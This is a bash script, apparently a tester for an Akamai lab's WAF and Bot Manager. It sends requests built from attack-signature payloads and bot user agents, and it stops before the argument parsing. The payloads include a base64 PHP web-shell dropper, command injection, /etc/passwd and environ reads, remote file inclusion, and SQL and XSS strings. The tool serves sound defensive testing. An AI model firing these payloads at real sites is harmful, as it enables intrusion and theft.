#!/bin/bash

function logo() {
    echo "      _               _             "
    echo "     | |             | |            "
    echo "  ___| |__   ___  ___| | _____ _ __ "
    echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|"
    echo "| (__| | | |  __/ (__|   <  __/ |   "
    echo " \___|_| |_|\___|\___|_|\_\___|_|   v1.0"
    echo ""
}

function help() {
    logo
    echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier"
    echo "Please check the information below in order to configure the proper parameters."
    echo
    echo "checker.sh -c [] -r [] -v -e -d -m"
    echo ""
    echo "-c  Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option"
    echo ""
    echo "Optional:"
    echo "-r  Identifier added to the referer header to filter in WSA."
    echo "-v  Verbose mode."
    echo "-e  Export results to a CSV file."
    echo "-d  Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too many tests are run)."
    echo "-m  Print manual."
    echo ""
}

function helpconf() {
    logo
    echo "This script reads a configuration file that uses the following 6 blocks of data per line:"
    echo ""
    echo "[type] [environment] [method] [URL] [path] [arguments(optional)]"
    echo ""
    echo "Examples:"
    echo "atg p GET http://www.{akamaized domain}.com / krs-cmd"
    echo "bms s GET http://www.{akamaized domain}.com / aka-arb"
    echo "bmp p POST http://www.{akamaized domain}.com / foo=bar"
    echo "man s GET http://www.{akamaized domain}.com /?foo=bar"
    echo "man p POST http://www.{akamaized domain}.com / foo=bar"
    echo ""
    echo "Available options:"
    echo "--------------------------------------------------------------------------------------"
    echo "type           The type of control that will be tested, options are:"
    echo "                 atg -- WAF Attack Groups"
    echo "                 bms -- Bot Manager Standard"
    echo "                 bmp -- Bot Manager Premier"
    echo "                 man -- Manual test"
    echo "environment    Destination of the request to be generated, options are:"
    echo "                 s -- Staging environment"
    echo "                 p -- Production environment"
    echo "method         Method expected on Akamai for the tested URL, options are: GET or POST"
    echo "url            URL to test, the protocol (http or https) needs to be used"
    echo "path           Path to test (use / if no specific path)"
    echo "arguments      For atg:"
    echo "                 krs-cmd -- Command Injection"
    echo "                 krs-xss -- Cross-Site Scripting"
    echo "                 krs-dos -- DDOS"
    echo "                 krs-iht -- Invalid HTTP"
    echo "                 krs-php -- PHP Injection"
    echo "                 krs-rfi -- Remote File Inclusion"
    echo "                 krs-sql -- SQL Injection"
    echo "                 krs-trj -- Trojan"
    echo "                 aag-wat -- Web Attack Tool"
    echo "                 aag-wpr -- Web Protocol Attack"
    echo "                 aag-sql -- SQL Injection"
    echo "                 aag-xss -- Cross-Site Scripting"
    echo "                 aag-lfi -- Local File Inclusion"
    echo "                 aag-rfi -- Remote File Inclusion"
    echo "                 aag-cmi -- Command Injection"
    echo "                 aag-wpl -- Web Platform Attack"
    echo "                 penalty -- Penalty test (no attack)"
    echo "               For bms:"
    echo "                 aka-arb -- Academic or Research Bots"
    echo "                 aka-asc -- Automated Shopping Cart and Sniper Bots"
    echo "                 aka-bib -- Business Intelligence Bots"
    echo "                 aka-eco -- E-Commerce Search Engine Bots"
    echo "                 aka-eag -- Enterprise Data Aggregator Bots"
    echo "                 aka-fia -- Financial Account Aggregator Bots"
    echo "                 aka-fis -- Financial Services Bots"
    echo "                 aka-job -- Job Search Engine Bots"
    echo "                 aka-mda -- Media or Entertainment Search Bots"
    echo "                 aka-new -- News Aggregator Bots"
    echo "                 aka-onl -- Online Advertising Bots"
    echo "                 aka-rss -- RSS Feed Reader Bots"
    echo "                 aka-seo -- SEO, Analytics or Marketing Bots"
    echo "                 aka-sit -- Site Monitoring and Web Development Bots"
    echo "                 aka-soc -- Social Media or Blog Bots"
    echo "                 aka-war -- Web Archiver Bots"
    echo "                 aka-wse -- Web Search Engine Bots"
    echo "                 tra-ikb -- Impersonators of Known Bots"
    echo "                 tra-dvf -- Development Frameworks"
    echo "                 tra-htl -- HTTP Libraries"
    echo "                 tra-wsl -- Web Services Libraries"
    echo "                 tra-osc -- Open Source Crawlers/Scraping Platforms"
    echo "                 tra-hbt -- Headless Browsers/Automation Tools"
    echo "                 tra-dcb -- Declared Bots (Keyword Match)"
    echo "                 tra-agc -- Aggressive Web Crawlers"
    echo "                 tra-req -- Request Anomaly"
    echo "                 act-cok -- Cookie Integrity Failed"
    echo "               For bmp:"
    echo "                 List of body parameters used by the endpoint (if any)"
    echo "               For man:"
    echo "                 If using POST, list of body parameters"
}

# Read the configuration file line by line and run one test per line.
function readconfig {
    if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi
    while IFS=' ' read -ra line || [ -n "$line" ]; do
        # Skip comment lines and blank lines
        [[ "$line" =~ ^(#.*|^$)$ ]] && continue
        for i in "${line[@]}"; do
            test_string+=("$i")
        done
        if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi
        # The URL column of the configuration line is overridden with the lab hostname built from $property
        test_string[3]='http://'$property'.akamai-lab.com'
        # echo $test_string[3]
        protocol=""
        sleepsec=5
        if [[ ${test_string[3]} =~ ^http:// ]]; then host=${test_string[3]:7}; protocol=${test_string[3]:0:4}; fi
        if [[ ${test_string[3]} =~ ^https:// ]]; then host=${test_string[3]:8}; protocol=${test_string[3]:0:5}; fi
        if [[ $host == '' ]]; then
            echo "Oops... didn't find any valid protocol."
            exit 1
        fi
        env=""
        if [[ ${test_string[1]} == 'p' ]]; then
            env="Production"
            if [[ $protocol == 'http' ]]; then resolve 1; fi
            if [[ $protocol == 'https' ]]; then resolve 2; fi
        elif [[ ${test_string[1]} == 's' ]]; then
            env="Staging"
            if [[ $protocol == 'http' ]]; then resolve 3; fi
            if [[ $protocol == 'https' ]]; then resolve 4; fi
        else
            echo "Oops... not a valid environment."
            exit 1
        fi
        test_string=()
        if [ $verbose -eq 1 ]; then echo -e "> sleeping for $sleepsec seconds..."; fi
        sleep $sleepsec
    done < "$filecnf"
}

# Pick the edge IP for the request and send it.
# $1: 1 = production http, 2 = production https, 3 = staging http, 4 = staging https.
# With -d the IP comes from a DNS lookup; otherwise a random entry of the hard-coded list is used.
# aag-* and penalty tests reuse the previously selected IP and skip the delay between tests.
function resolve() {
    xpass=0
    if [[ $1 == 1 ]]; then
        if [[ $PFIP == '' ]]; then
            PFIPi=$(dig +short "$PFFQ" | tail -n1)
            if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi
        else
            if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then
                xpass=1
            else
                if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi
                sleepsec=0
            fi
            if [[ $xpass == 1 ]]; then
                iparray=(${PFIP//:/ })
                PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
            fi
            if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi
        fi
        curl $PFIPi
    elif [[ $1 == 2 ]]; then
        if [[ $PEIP == '' ]]; then
            PEIPi=$(dig +short "$PEFQ" | tail -n1)
            if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi
        else
            if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then
                xpass=1
            else
                if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi
                sleepsec=0
            fi
            if [[ $xpass == 1 ]]; then
                iparray=(${PEIP//:/ })
                PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
            fi
            if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi
        fi
        curl $PEIPi
    elif [[ $1 == 3 ]]; then
        if [[ $SFIP == '' ]]; then
            SFIPi=$(dig +short "$SFFQ" | tail -n1)
            if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi
        else
            if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then
                xpass=1
            else
                if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi
                sleepsec=0
            fi
            if [[ $xpass == 1 ]]; then
                iparray=(${SFIP//:/ })
                SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
            fi
            if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi
        fi
        curl $SFIPi
    elif [[ $1 == 4 ]]; then
        if [[ $SEIP == '' ]]; then
            SEIPi=$(dig +short "$SEFQ" | tail -n1)
            if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi
        else
            if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then
                xpass=1
            else
                if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi
                sleepsec=0
            fi
            if [[ $xpass == 1 ]]; then
                iparray=(${SEIP//:/ })
                SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
            fi
            if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi
        fi
        curl $SEIPi
    fi
}

# Append one result row to the CSV file created when -e is set.
function exportcsv() {
    if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi
    export_payload=""
    export_type=""
    # Map the acronyms of the configuration line to their readable names
    for i in "${!ACRONYMA[@]}"; do
        if [[ ${test_string[5]} == "${ACRONYMA[$i]}" ]]; then export_payload=${ACRONYMB[$i]}; fi
        if [[ ${test_string[0]} == "${ACRONYMA[$i]}" ]]; then export_type=${ACRONYMB[$i]}; fi
    done
    if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi
    echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename "${filecnf}")_${filetim}.csv"
}

# Build the request parts (query string, headers, body) for a colon-separated list of rule IDs in $1.
function payload {
    PARAMHOLDER="?id=1"
    HEADERHOLDER1=""
    HEADERHOLDER2=""
    HEADERHOLDER3=""
    rules=(${1//:/ })
    for i in "${!rules[@]}"; do
        case ${rules[$i]} in
            "950002") PARAMHOLDER+="&p=powershell.exe" ;;
            "950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute" ;;
            "950011") PARAMHOLDER+="&p=%3C%21--%23printenv" ;;
            "950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F" ;;
            "950907") PARAMHOLDER+="&p=wget" ;;
            "3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping" ;;
            "3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f" ;;
            "3000012") PARAMHOLDER+="&p=action%3Anew+java." ;;
            "3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site" ;;
            "3000014") PARAMHOLDER+="&p=%24%7B.openstream()." ;;
            "3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron" ;;
            "3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do" ;;
            "3000025") PARAMHOLDER+="&p=()%20%7B.4654" ;;
            "3000031") HEADERHOLDER2+="Range: 18446744073709551615" ;;
            "3000033") PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F" ;;
            "3000034")
                PARAMHOLDER+="&p=Runtime.getRuntime(" ;;
            "3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute" ;;
            "3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D" ;;
            "3000058") PARAMHOLDER+="&p=action%3A%24%7B" ;;
            "3000065")
                H10="Content-Type: text/xml"
                DATAHOLDER='%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'
                ;;
            "3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude" ;;
            "3000072")
                H10="Content-Type: application/octet-stream"
                DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'
                ;;
            "950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23" ;;
            "958000") PARAMHOLDER+="&p=.addimport" ;;
            "958001") PARAMHOLDER+="&p=document.exitFullscreen%5D" ;;
            "958002") PARAMHOLDER+="&p=.execscript" ;;
            "958003") PARAMHOLDER+="&p=.fromcharcode" ;;
            "958004") PARAMHOLDER+="&p=.innerhtml" ;;
            "958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B" ;;
            "958006") PARAMHOLDER+="&p=%3Cbody%20background" ;;
            "958007") PARAMHOLDER+="&p=%3Cbody%20onload" ;;
            "958008") PARAMHOLDER+="&p=%3Cinput%20type%20image" ;;
            "958009") PARAMHOLDER+="&p=%40import" ;;
            "958010") PARAMHOLDER+="&p=activexobject" ;;
            "958011") PARAMHOLDER+="&p=background-image%3A" ;;
            "958012") PARAMHOLDER+="&p=copyparentfolder" ;;
            "958013") PARAMHOLDER+="&p=createtextrange" ;;
            "958016") PARAMHOLDER+="&p=getparentfolder" ;;
            "958017") PARAMHOLDER+="&p=getspecialfolder" ;;
            "958018") PARAMHOLDER+="&p=href%20javascript%3A" ;;
            "958019") PARAMHOLDER+="&p=href%20shell%3A" ;;
            "958020") PARAMHOLDER+="&p=href%20vbscript%3A" ;;
            "958022") PARAMHOLDER+="&p=livescript%3A" ;;
            "958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A" ;;
            "958024") PARAMHOLDER+="&p=lowsrc%20shell%3A" ;;
            "958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A" ;;
            "958026") PARAMHOLDER+="&p=mocha%3A" ;;
            "958027") PARAMHOLDER+="&p=onabort" ;;
            "958028") PARAMHOLDER+="&p=settimeout%20(" ;;
            "958030") PARAMHOLDER+="&p=src%20http%3A" ;;
            "958031") PARAMHOLDER+="&p=src%20javascript%3A" ;;
            "958032") PARAMHOLDER+="&p=src%20shell%3A" ;;
            "958033") PARAMHOLDER+="&p=src%20vbscript%3A" ;;
            "958034") PARAMHOLDER+="&p=style%3Dbexpression(" ;;
            "958036") PARAMHOLDER+="&p=type%20application%20x-javascript" ;;
            "958037") PARAMHOLDER+="&p=type%20application%20x-vbscript" ;;
            "958038") PARAMHOLDER+="&p=type%20text%20ecmascript" ;;
            "958039") PARAMHOLDER+="&p=type%20text%20javascript" ;;
            "958040") PARAMHOLDER+="&p=type%20text%20jscript" ;;
            "958041") PARAMHOLDER+="&p=type%20text%20vbscript" ;;
            "958045") PARAMHOLDER+="&p=url%20javascript%3A" ;;
            "958046") PARAMHOLDER+="&p=url%20shell%3A" ;;
            "958047") PARAMHOLDER+="&p=url%20vbscript%3A" ;;
            "3000036") PARAMHOLDER+="&foo&msg=bar" ;;
            "950116") PARAMHOLDER="%ufF12/" ;;
            "950107") PARAMHOLDER="%00%!%u1234/?id=1" ;;
            "950108")
                H10="Content-Type: application/x-www-form-urlencoded;charset=test"
                DATAHOLDER='%00%!%u1234/'
                ;;
            "950109") PARAMHOLDER+="&p=%2500%25!%25u1234" ;;
            "958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-," ;;
            "958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-," ;;
            "958291") HEADERHOLDER1="Range: bytes=0-" ;;
            "958295") HEADERHOLDER1="Connection: keep-alive,close" ;;
            "960006") H9="User-Agent;" ;;
            "960007") H6="Host;" ;;
            "960008") H6="Host:" ;;
            "960009") H9="User-Agent:" ;;
            "960010") HEADERHOLDER1="Content-Type: application/x-www-checker" ;;
            "960011") HEADERHOLDER2="Content-Length: 1000" ;;
            "960012") HEADERHOLDER2="Content-Length:" ;;
            "960016") HEADERHOLDER2="Content-Length: checker" ;;
            "960022")
                HEADERHOLDER1="Expect: 100-continue"
                PROTOCOLHOLDER="--http1.0"
                ;;
            "960034")
                PROTOCOLHOLDER="--httpX.X" ;;
            "960038") HEADERHOLDER1="Content-Range: test" ;;
            "960901") PARAMHOLDER+="&one=more" ;;
            "960902") HEADERHOLDER3="Content-Encoding: Identity" ;;
            "958976") PARAMHOLDER+="&current={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));" ;;
            "958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput" ;;
            "959151") PARAMHOLDER+="&p=%3C%3F%3C%3F" ;;
            "3000003") PARAMHOLDER+="&p=base64_decode(" ;;
            "3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C" ;;
            "950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123" ;;
            "950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B" ;;
            "950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F" ;;
            "950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B" ;;
            "950001") PARAMHOLDER+="&p=dbms_java" ;;
            "950007") PARAMHOLDER+="&p=attnotnull" ;;
            "950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test" ;;
            "950908") PARAMHOLDER+="&p=coalesce" ;;
            "959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20(" ;;
            "959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C" ;;
            "959072") PARAMHOLDER+="&p=AND%20%27string%27%3D" ;;
            "959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having" ;;
            "981172") COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27" ;;
            "950110") HEADERHOLDER1="x_file: test" ;;
            "950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir" ;;
            "watatomic")
                PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"
                UAHOLDER+=" absinthe"
                HEADERHOLDER1="acunetix-aspect: 1"
                HEADERHOLDER2="nstealth_xss: nstealth_xss"
                ;;
            "wpratomic")
                HEADERHOLDER1="Content-Type: application/xml"
                HEADERHOLDER2=" Transfer-Encoding: checker"
                HEADERHOLDER3="Content-Length: chunked"
                ;;
            "sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--" ;;
            "xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd" ;;
            "lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd" ;;
            "rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt" ;;
            "cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami" ;;
            "wplatomic") HEADERHOLDER1+="Range: 18446744073709551615" ;;
            *) PARAMHOLDER="" ;;
        esac
    done
}

# Build and send one test request through the edge IP given in $1, then parse the response.
# This function shadows the curl binary, which is therefore called by absolute path below.
function curl {
    shopt -s nocasematch
    if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then
        if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi
        if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi
        COOKIEHOLDER=""
        HEADERHOLDER1="Connection: keep-alive"
        HEADERHOLDER2=""
        # Reset so a header set by a previous test does not leak into this one
        HEADERHOLDER3=""
        PARAMHOLDER=""
        PATHHOLDER=""
        DATAHOLDER="{'foo':'bar'}"
        UAHOLDER=""
        PROTOCOLHOLDER="--http2"
        # The Referer header carries the -r identifier, or the current epoch when -r is not set
        if [ -z "$fileref" ]; then epoch=$(date +%s); else epoch=$fileref; fi
        H1="Accept: application/json"
        H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5"
        H3="Accept-Language: en-US,en;q=1.0"
        H4="Cache-Control: no-cache"
        H5="Cookie: foo=bar;"
        H6="Host: $host"
        H7="Origin: ${test_string[3]}"
        H8="Referer: $epoch"
        H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker"
        H10="Content-Type: text/plain"
        if [ "${test_string[0]}" = 'atg' ]; then
            if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi
            case ${test_string[5]} in
                "krs-cmd") payload "950002:950006:950011:950103:950907:3000005" ;;
                "krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047" ;;
                "krs-dos") payload "3000036" ;;
                "krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902" ;;
                "krs-php") payload "958976:958977:959151:3000003:3000016" ;;
                "krs-rfi") payload "950117:950118:950119:950120" ;;
                "krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172" ;;
                "krs-trj") payload "950110:950921" ;;
                "aag-wat") payload "watatomic" ;;
                "aag-wpr") payload "wpratomic" ;;
                "aag-sql") payload "sqlatomic" ;;
                "aag-xss") payload "xssatomic" ;;
                "aag-lfi") payload "lfiatomic" ;;
                "aag-rfi") payload "rfiatomic" ;;
                "aag-cmi") payload "cmiatomic" ;;
                "aag-wpl") payload "wplatomic" ;;
                "penalty") payload "" ;;
                *) echo -e 'Oops... invalid argument!'; exit 1 ;;
            esac
        elif [ "${test_string[0]}" = 'bms' ]; then
            if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi
            case ${test_string[5]} in
                "aka-arb") UAHOLDER+=" lightspeedsystems" ;;
                # '=' rather than '+=': the header replaces the default Connection header instead of being appended to it
                "aka-asc") HEADERHOLDER1="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a" ;;
                "aka-bib") UAHOLDER+=" companybooknetworking.com" ;;
                "aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi" ;;
                "aka-eag") UAHOLDER+=" shrinktheweb.com" ;;
                "aka-fia")
                    UAHOLDER+=" (moneyforward)"
                    HEADERHOLDER1="X-MF-Tag:12345678"
                    ;;
                "aka-fis") UAHOLDER+=" drwholdings.com" ;;
                "aka-job") UAHOLDER+=" motorelavoro.it" ;;
                "aka-mda") UAHOLDER+=" localconditions.com" ;;
                "aka-new") UAHOLDER+=" reader.aol.com" ;;
                "aka-onl") UAHOLDER+=" integralads.com" ;;
                "aka-rss") UAHOLDER+=" pocketcasts.com" ;;
                "aka-seo") UAHOLDER+=" terrykyleseoagency.com" ;;
                "aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor" ;;
                "aka-soc") UAHOLDER+=" socialrank.io" ;;
                "aka-war")
                    UAHOLDER+=" europarchive.org" ;;
                "aka-wse") UAHOLDER+=" femtosearch.com" ;;
                "tra-ikb") UAHOLDER+=" amazon route 53" ;;
                "tra-dvf") UAHOLDER+=" ruby microsoft atl native" ;;
                "tra-htl") UAHOLDER+=" winhttprequest" ;;
                "tra-wsl") UAHOLDER+=" httpful" ;;
                "tra-osc") UAHOLDER+=" mercury.postlight.com" ;;
                "tra-hbt") UAHOLDER+=" prerender" ;;
                "tra-dcb") UAHOLDER+=" semantic" ;;
                "tra-agc") UAHOLDER+=" openhose.org" ;;
                "tra-req")
                    HEADERHOLDER1="Accept-Language: en"
                    UAHOLDER+=" mozilla./"
                    ;;
                "act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar" ;;
                *) echo -e 'Oops... invalid argument!'; exit 1 ;;
            esac
        elif [ "${test_string[0]}" = 'bmp' ]; then
            if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi
            if [[ ${test_string[5]} != '' ]]; then
                DATAHOLDER="${test_string[5]}"
            fi
            test_string[5]="BMP"
        elif [ "${test_string[0]}" = 'man' ]; then
            if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi
            if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi
            test_string[5]="Manual"
        else
            if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi
        fi

        description=""
        if [ "${test_string[5]}" = 'aka-arb' ]; then description="Academic or Research Bots"
        elif [ "${test_string[5]}" = 'aka-seo' ]; then description="SEO, Analytics or Marketing Bots"
        elif [ "${test_string[5]}" = 'aka-eco' ]; then description='E-Commerce Search Engine Bots'
        elif [ "${test_string[5]}" = 'tra-ikb' ]; then description='Impersonators of Known Bots'
        elif [ "${test_string[5]}" = 'tra-hbt' ]; then description='Headless Browsers/Automation Tools'
        elif [ "${test_string[5]}" = 'act-cok' ]; then description='Cookie Integrity Failed'
        else description='not equal'
        fi
        export now=$(date)
        echo -e "\t $now : [ $env ] [ $description ]"

        H9+=${UAHOLDER}
        H5+=${COOKIEHOLDER}
        URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}"
        CURL='/usr/bin/curl'
        # --connect-to sends the request to the selected edge IP while keeping the tested hostname
        CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1"
        # Debug headers sent with every request
        PRAGMA="Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values"
        echo -e "${test_string[3]}${test_string[4]}"
        if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then
            if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"$PRAGMA\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi
            $CURL $CURLARGS "$URL" \
                -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" \
                -H "$PRAGMA" -H "$H10" \
                -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" \
                --data-raw "$DATAHOLDER" &> .temp
        else
            if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"$PRAGMA\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi
            $CURL $CURLARGS "$URL" \
                -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" \
                -H "$PRAGMA" \
                -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp
        fi
        echo "checker" >> .temp

        # Extract the HTTP status (or the curl error) and the Akamai reference ID from the captured output
        regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})'
        regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)'
        regexdie='.*doctype.*|^(^$)$'
        stopv=0
        http="Timeout"
        refe="Unable to get AK_REFERENCE_ID"
        while IFS= read -r liner; do
            # Decode the HTML numeric entities for '.' and '#' so that regexref can match the reference ID
            liner="${liner//&#46;/.}"
            liner="${liner//&#35;/#}"
            if [[ $liner =~ $regexhtc ]]; then
                http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"
                http=${http%$'\r'}
                http=${http%$' '}
            fi
            if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi
            # In verbose mode, print the output up to the first blank line or doctype line
            if [ $verbose -eq 1 ]; then
                if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi
            fi
        done < .temp
        echo -e "${http}"
        # echo -e "${epoch}"
        # echo -e "${refe}"
        echo -e ""
        if [[ ${filetim} != '' ]]; then exportcsv; fi
    else
        echo -e 'Oops... wrong method!'
        exit 1
    fi
}

# Third positional argument: property name used to build the lab hostname in readconfig
property=$3
verbose=0
filetim=""; filecnf=""; fileref=""
PFIPi=""; PEIPi=""; SFIPi=""; SEIPi=""

